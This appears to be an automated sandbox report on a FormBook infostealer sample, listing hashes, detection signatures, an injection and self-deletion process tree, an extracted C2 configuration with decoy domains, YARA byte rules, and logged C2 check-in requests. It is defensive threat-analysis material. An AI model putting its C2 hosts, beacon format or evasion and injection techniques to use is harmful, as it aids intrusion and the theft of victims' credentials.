
Windows Analysis Report HkE0tD0g4NXKJfy.exe

Overview

General Information

Sample Name: HkE0tD0g4NXKJfy.exe
Analysis ID: 528615
MD5: fcc2d1cda8d3989feca9c5f5f900e164
SHA1: 075de723df172cc93c537d5472ad8025f192ddc8
SHA256: 77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • HkE0tD0g4NXKJfy.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
    • HkE0tD0g4NXKJfy.exe (PID: 3336 cmdline: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5904 cmdline: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5960

          Jbx Signature Overview


          AV Detection:

Found malware configuration
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}
Multi AV Scanner detection for submitted file
Source: HkE0tD0g4NXKJfy.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: HkE0tD0g4NXKJfy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HkE0tD0g4NXKJfy.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe, Code function: 4x nop then pop ebx, 7_2_00406AB4
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe, Code function: 4x nop then pop esi, 7_2_00415760
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe, Code function: 4x nop then pop esi, 7_2_004157C6
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop ebx, 13_2_02D06AB5
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop esi, 13_2_02D157C6
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop esi, 13_2_02D15760

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.platinumcredit.net
Source: C:\Windows\explorer.exe, Domain query: www.thefullfledged.com
Source: C:\Windows\explorer.exe, Domain query: www.jakital.com
Source: C:\Windows\explorer.exe, Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe, Domain query: www.xcgtsret.com
Source: C:\Windows\explorer.exe, Domain query: www.suepersoldiers.com
Source: C:\Windows\explorer.exe, Domain query: www.arsels.info
Source: C:\Windows\explorer.exe, Domain query: www.electricatrick.com
Source: C:\Windows\explorer.exe, Network Connect: 103.224.212.219 80
Source: C:\Windows\explorer.exe, Network Connect: 52.204.216.132 80
Source: C:\Windows\explorer.exe, Domain query: www.151motors.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.platinumcredit.net/sh5d/
Source: Joe Sandbox View, ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1 | Host: www.platinumcredit.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1 | Host: www.151motors.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1 | Host: www.suepersoldiers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1 | Host: www.arsels.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1 | Host: www.electricatrick.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1 | Host: www.vupeliquid.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 103.224.212.219 103.224.212.219
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:09 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be73d-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:14 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be75c-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:36 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576c-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:10:15 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576d-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmp, String found in binary or memory: http://www.jakital.com/
Source: msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmp, String found in binary or memory: http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G
Source: unknown, DNS traffic detected: queries for: www.platinumcredit.net

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
